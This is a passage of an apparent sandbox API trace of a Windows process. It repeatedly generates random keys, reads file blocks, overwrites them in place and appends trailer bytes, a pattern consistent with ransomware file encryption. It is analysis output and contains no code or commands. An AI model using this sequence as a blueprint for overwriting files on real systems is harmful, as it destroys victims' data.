hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.951] GetProcessHeap () returned 0x4f10000 [0083.951] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.951] GetProcessHeap () returned 0x4f10000 [0083.951] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.951] GetProcessHeap () returned 0x4f10000 [0083.951] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.952] GetProcessHeap () returned 0x4f10000 [0083.952] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.952] GetProcessHeap () returned 0x4f10000 [0083.952] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.952] GetProcessHeap () returned 0x4f10000 [0083.952] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.952] GetProcessHeap () returned 0x4f10000 [0083.952] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.952] GetProcessHeap () returned 0x4f10000 [0083.952] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.952] GetProcessHeap () returned 0x4f10000 [0083.952] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.952] GetProcessHeap () returned 0x4f10000 [0083.952] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.952] GetProcessHeap () returned 0x4f10000 [0083.952] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0083.952] GetProcessHeap () returned 0x4f10000 [0083.952] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.952] GetProcessHeap () returned 0x4f10000 [0083.952] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0083.952] GetProcessHeap () returned 0x4f10000 [0083.952] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0083.952] GetProcessHeap () returned 0x4f10000 [0083.952] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0083.952] GetProcessHeap () returned 0x4f10000 [0083.952] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0083.952] SetFilePointerEx (in: hFile=0x968, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.952] WriteFile (in: hFile=0x968, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x84afd44*=0x100, lpOverlapped=0x0) returned 1 [0083.953] WriteFile (in: hFile=0x968, lpBuffer=0x84afd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x84afd48*, lpNumberOfBytesWritten=0x84afd44*=0x4, lpOverlapped=0x0) returned 1 [0083.953] GetProcessHeap () returned 0x4f10000 [0083.953] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b610d8 | out: hHeap=0x4f10000) returned 1 [0083.953] GetProcessHeap () returned 0x4f10000 [0083.953] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0083.953] GetProcessHeap () returned 0x4f10000 [0083.953] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0083.953] CloseHandle (hObject=0x968) returned 1 [0083.954] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 122 [0083.954] SetFilePointerEx (in: hFile=0x96c, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.954] ReadFile (in: hFile=0x96c, lpBuffer=0x84afd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x84afd08, lpOverlapped=0x0 | out: lpBuffer=0x84afd4c*, lpNumberOfBytesRead=0x84afd08*=0x0, lpOverlapped=0x0) returned 1 [0083.954] SetFilePointerEx (in: hFile=0x96c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.954] GetProcessHeap () returned 0x4f10000 [0083.954] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0083.954] GetProcessHeap () returned 0x4f10000 [0083.954] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0083.954] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0083.954] GetProcessHeap () returned 0x4f10000 [0083.954] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b610d8 [0083.954] ReadFile (in: hFile=0x96c, lpBuffer=0x8b610d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x84afd08, lpOverlapped=0x0 | out: lpBuffer=0x8b610d8*, lpNumberOfBytesRead=0x84afd08*=0x1000, lpOverlapped=0x0) returned 1 [0084.011] SetFilePointerEx (in: hFile=0x96c, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.011] WriteFile (in: hFile=0x96c, lpBuffer=0x8b610d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x8b610d8*, lpNumberOfBytesWritten=0x84afd44*=0x1000, lpOverlapped=0x0) returned 1 [0084.011] GetProcessHeap () returned 0x4f10000 [0084.011] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0084.011] GetProcessHeap () returned 0x4f10000 [0084.011] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0084.011] GetProcessHeap () returned 0x4f10000 [0084.011] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0084.011] GetProcessHeap () returned 0x4f10000 [0084.011] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0084.011] GetProcessHeap () returned 0x4f10000 [0084.011] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0084.011] GetProcessHeap () returned 0x4f10000 [0084.011] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0084.011] GetProcessHeap () returned 0x4f10000 [0084.011] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.011] GetProcessHeap () returned 0x4f10000 [0084.011] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.011] GetProcessHeap () returned 0x4f10000 [0084.011] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.011] GetProcessHeap () returned 0x4f10000 [0084.011] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.012] GetProcessHeap () returned 0x4f10000 [0084.012] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.012] GetProcessHeap () returned 0x4f10000 [0084.012] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.012] GetProcessHeap () returned 0x4f10000 [0084.012] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.012] GetProcessHeap () returned 0x4f10000 [0084.012] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.012] GetProcessHeap () returned 0x4f10000 [0084.012] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.012] GetProcessHeap () returned 0x4f10000 [0084.012] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.012] GetProcessHeap () returned 0x4f10000 [0084.012] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.012] GetProcessHeap () returned 0x4f10000 [0084.012] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.012] GetProcessHeap () returned 0x4f10000 [0084.012] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.012] GetProcessHeap () returned 0x4f10000 [0084.012] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.012] GetProcessHeap () returned 0x4f10000 [0084.012] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.012] GetProcessHeap () returned 0x4f10000 [0084.012] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.012] GetProcessHeap () returned 0x4f10000 [0084.012] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.012] GetProcessHeap () returned 0x4f10000 [0084.012] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.012] GetProcessHeap () returned 0x4f10000 [0084.012] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.012] GetProcessHeap () returned 0x4f10000 [0084.012] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.012] GetProcessHeap () returned 0x4f10000 [0084.012] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.012] GetProcessHeap () returned 0x4f10000 [0084.012] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.012] GetProcessHeap () returned 0x4f10000 [0084.012] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.012] GetProcessHeap () returned 0x4f10000 [0084.012] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.012] GetProcessHeap () returned 0x4f10000 [0084.013] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.013] GetProcessHeap () returned 0x4f10000 [0084.013] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.013] GetProcessHeap () returned 0x4f10000 [0084.013] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.013] GetProcessHeap () returned 0x4f10000 [0084.013] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.013] GetProcessHeap () returned 0x4f10000 [0084.013] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.013] GetProcessHeap () returned 0x4f10000 [0084.013] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.013] GetProcessHeap () returned 0x4f10000 [0084.013] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.013] GetProcessHeap () returned 0x4f10000 [0084.013] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.013] GetProcessHeap () returned 0x4f10000 [0084.013] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0084.013] GetProcessHeap () returned 0x4f10000 [0084.013] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.013] GetProcessHeap () returned 0x4f10000 [0084.013] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0084.013] GetProcessHeap () returned 0x4f10000 [0084.013] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0084.013] GetProcessHeap () returned 0x4f10000 [0084.013] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0084.013] GetProcessHeap () returned 0x4f10000 [0084.013] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0084.013] GetProcessHeap () returned 0x4f10000 [0084.013] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0084.013] GetProcessHeap () returned 0x4f10000 [0084.013] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0084.013] GetProcessHeap () returned 0x4f10000 [0084.013] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0084.013] GetProcessHeap () returned 0x4f10000 [0084.013] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0084.013] GetProcessHeap () returned 0x4f10000 [0084.013] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0084.014] GetProcessHeap () returned 0x4f10000 [0084.014] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0084.014] GetProcessHeap () returned 0x4f10000 [0084.014] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0084.014] GetProcessHeap () returned 0x4f10000 [0084.014] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0084.014] GetProcessHeap () returned 0x4f10000 [0084.014] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0084.014] GetProcessHeap () returned 0x4f10000 [0084.014] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0084.014] GetProcessHeap () returned 0x4f10000 [0084.014] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0084.014] GetProcessHeap () returned 0x4f10000 [0084.014] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0084.014] GetProcessHeap () returned 0x4f10000 [0084.014] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0084.014] GetProcessHeap () returned 0x4f10000 [0084.014] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0084.014] GetProcessHeap () returned 0x4f10000 [0084.014] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0084.014] GetProcessHeap () returned 0x4f10000 [0084.014] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0084.014] GetProcessHeap () returned 0x4f10000 [0084.014] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0084.014] GetProcessHeap () returned 0x4f10000 [0084.014] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0084.014] GetProcessHeap () returned 0x4f10000 [0084.014] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0084.014] GetProcessHeap () returned 0x4f10000 [0084.015] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0084.015] GetProcessHeap () returned 0x4f10000 [0084.015] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0084.015] GetProcessHeap () returned 0x4f10000 [0084.015] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0084.015] GetProcessHeap () returned 0x4f10000 [0084.015] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0084.015] GetProcessHeap () returned 0x4f10000 [0084.015] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0084.015] GetProcessHeap () returned 0x4f10000 [0084.015] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0084.015] GetProcessHeap () returned 0x4f10000 [0084.015] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0084.015] GetProcessHeap () returned 0x4f10000 [0084.015] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0084.015] GetProcessHeap () returned 0x4f10000 [0084.015] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0084.015] GetProcessHeap () returned 0x4f10000 [0084.015] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0084.015] GetProcessHeap () returned 0x4f10000 [0084.015] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0084.015] GetProcessHeap () returned 0x4f10000 [0084.015] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0084.015] GetProcessHeap () returned 0x4f10000 [0084.015] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0084.015] GetProcessHeap () returned 0x4f10000 [0084.015] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0084.015] GetProcessHeap () returned 0x4f10000 [0084.015] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0084.015] SetFilePointerEx (in: hFile=0x96c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.015] WriteFile (in: hFile=0x96c, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x84afd44*=0x100, lpOverlapped=0x0) returned 1 [0084.016] WriteFile (in: hFile=0x96c, lpBuffer=0x84afd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x84afd48*, lpNumberOfBytesWritten=0x84afd44*=0x4, lpOverlapped=0x0) returned 1 [0084.016] GetProcessHeap () returned 0x4f10000 [0084.016] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b610d8 | out: hHeap=0x4f10000) returned 1 [0084.016] GetProcessHeap () returned 0x4f10000 [0084.016] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0084.016] GetProcessHeap () returned 0x4f10000 [0084.016] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0084.016] CloseHandle (hObject=0x96c) returned 1 [0084.017] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 123 [0084.017] SetFilePointerEx (in: hFile=0x8fc, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.017] ReadFile (in: hFile=0x8fc, lpBuffer=0x84afd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x84afd08, lpOverlapped=0x0 | out: lpBuffer=0x84afd4c*, lpNumberOfBytesRead=0x84afd08*=0x0, lpOverlapped=0x0) returned 1 [0084.017] SetFilePointerEx (in: hFile=0x8fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.018] GetProcessHeap () returned 0x4f10000 [0084.018] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0084.018] GetProcessHeap () returned 0x4f10000 [0084.018] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0084.018] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0084.018] GetProcessHeap () returned 0x4f10000 [0084.018] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b610d8 [0084.018] ReadFile (in: hFile=0x8fc, lpBuffer=0x8b610d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x84afd08, lpOverlapped=0x0 | out: lpBuffer=0x8b610d8*, lpNumberOfBytesRead=0x84afd08*=0x1000, lpOverlapped=0x0) returned 1 [0084.068] SetFilePointerEx (in: hFile=0x8fc, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.068] WriteFile (in: hFile=0x8fc, lpBuffer=0x8b610d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x8b610d8*, lpNumberOfBytesWritten=0x84afd44*=0x1000, lpOverlapped=0x0) returned 1 [0084.069] GetProcessHeap () returned 0x4f10000 [0084.069] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0084.069] GetProcessHeap () returned 0x4f10000 [0084.069] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0084.069] GetProcessHeap () returned 0x4f10000 [0084.069] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0084.069] GetProcessHeap () returned 0x4f10000 [0084.069] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0084.069] GetProcessHeap () returned 0x4f10000 [0084.069] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0084.069] GetProcessHeap () returned 0x4f10000 [0084.069] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0084.069] GetProcessHeap () returned 0x4f10000 [0084.069] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.069] GetProcessHeap () returned 0x4f10000 [0084.069] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.069] GetProcessHeap () returned 0x4f10000 [0084.069] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.069] GetProcessHeap () returned 0x4f10000 [0084.069] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.069] GetProcessHeap () returned 0x4f10000 [0084.069] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.069] GetProcessHeap () returned 0x4f10000 [0084.069] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.069] GetProcessHeap () returned 0x4f10000 [0084.069] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.069] GetProcessHeap () returned 0x4f10000 [0084.069] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.069] GetProcessHeap () returned 0x4f10000 [0084.069] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.069] GetProcessHeap () returned 0x4f10000 [0084.069] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.069] GetProcessHeap () returned 0x4f10000 [0084.069] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.069] GetProcessHeap () returned 0x4f10000 [0084.070] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.070] GetProcessHeap () returned 0x4f10000 [0084.070] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.070] GetProcessHeap () returned 0x4f10000 [0084.070] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.070] GetProcessHeap () returned 0x4f10000 [0084.070] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.070] GetProcessHeap () returned 0x4f10000 [0084.070] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.070] GetProcessHeap () returned 0x4f10000 [0084.070] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.070] GetProcessHeap () returned 0x4f10000 [0084.070] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.070] GetProcessHeap () returned 0x4f10000 [0084.070] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.070] GetProcessHeap () returned 0x4f10000 [0084.070] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.070] GetProcessHeap () returned 0x4f10000 [0084.070] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.070] GetProcessHeap () returned 0x4f10000 [0084.070] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.070] GetProcessHeap () returned 0x4f10000 [0084.070] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.070] GetProcessHeap () returned 0x4f10000 [0084.070] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.070] GetProcessHeap () returned 0x4f10000 [0084.070] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.070] GetProcessHeap () returned 0x4f10000 [0084.070] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.070] GetProcessHeap () returned 0x4f10000 [0084.070] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.070] GetProcessHeap () returned 0x4f10000 [0084.070] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.070] GetProcessHeap () returned 0x4f10000 [0084.070] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.070] GetProcessHeap () returned 0x4f10000 [0084.070] HeapFree (in: hHeap=0x4f10000, 